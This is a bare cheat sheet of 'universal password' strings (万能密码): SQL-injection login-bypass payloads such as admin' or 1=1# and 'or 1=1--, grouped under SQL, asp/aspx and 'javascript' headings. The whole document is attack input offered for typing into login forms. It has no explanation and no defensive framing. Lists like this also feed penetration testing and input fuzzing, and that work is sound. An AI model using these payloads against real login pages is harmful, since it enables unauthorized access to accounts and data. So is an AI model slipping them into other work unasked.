万能密码

	SQL万能密码
		admin' or 1=1#
		'or 1=1
		"or "a"="a
		"or 1=1--
		"or"="
		"or"="a'='a
		"or1=1--
		"or=or"
		''or'='or'
		') or ('a'='a
		'.).or.('.a.'='.a
		'or 1=1
		'or 1=1--
		'or 1=1/*
		'or"="a'='a
		'or' '1'='1'
		'or''='
		'or''=''or''='
		'or'='1'
		'or'='or'
		'or.'a.'='a
		'or1=1--
		1'or'1'='1
		a'or' 1=1--
		a'or'1=1--
		or 'a'='a'
		or 1=1--
		or1=1-- 

	asp/aspx万能密码
		"or "a"="a
		'.).or.('.a.'='.a
		or 1=1--
		'or 1=1--
		a'or' 1=1--
		"or 1=1--
		'or.'a.'='a
		"or"="a'='a
		'or''='
		or'='or' 

	javascript万能密码
		1'or'1'='1
		admin' or 1=1
